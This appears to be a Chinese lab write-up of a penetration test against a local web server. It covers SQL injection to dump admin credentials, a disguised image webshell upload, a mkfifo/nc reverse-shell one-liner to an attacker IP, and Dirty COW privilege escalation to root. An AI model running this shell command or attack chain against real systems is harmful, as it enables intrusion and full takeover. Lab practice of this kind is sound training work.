攻击机:
主机发现:
信息收集:
端口详细信息:
尝试访问80端口,发现其有一web站点可以访问:
对url:http://192.168.11.128/storypage_04.php?id=115进行测试,检查是否有SQL注入漏洞:
报错,此处应该有注入点。
**数据库名:
得到该数据库的所有数据库名:information_schema,mysql,performance_schema,tcic,test
爆当前使用的数据库为tcic:
爆表名:
爆tcic_account的字段:
爆account和password的数据:
拿到管理员的账号密码。
然后扫描后台网址:
发现后台为http://192.168.11.128/back,尝试访问:
用之前获取到的管理员账号密码登录:
对后台各个功能进行使用,发现“首页管理系统”中的“新增大图”能上传图片,制作图片马上传,看看能不能用,成功:
用菜刀连接试试:
http://192.168.11.133/back/upload/banner_66.php
连接成功,拿到webshell(注:中途重装过peixun-server,故IP变为192.168.11.133)。
下面尝试提权。
蚁剑输入命令:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.11.130 6666 >/tmp/f
然后在kali开启监听6666端口,反弹shell成功:
然后提权:
蚁剑上传dirty.c到服务器:
编译:
脏牛执行成功:
提权成功:
得到了root: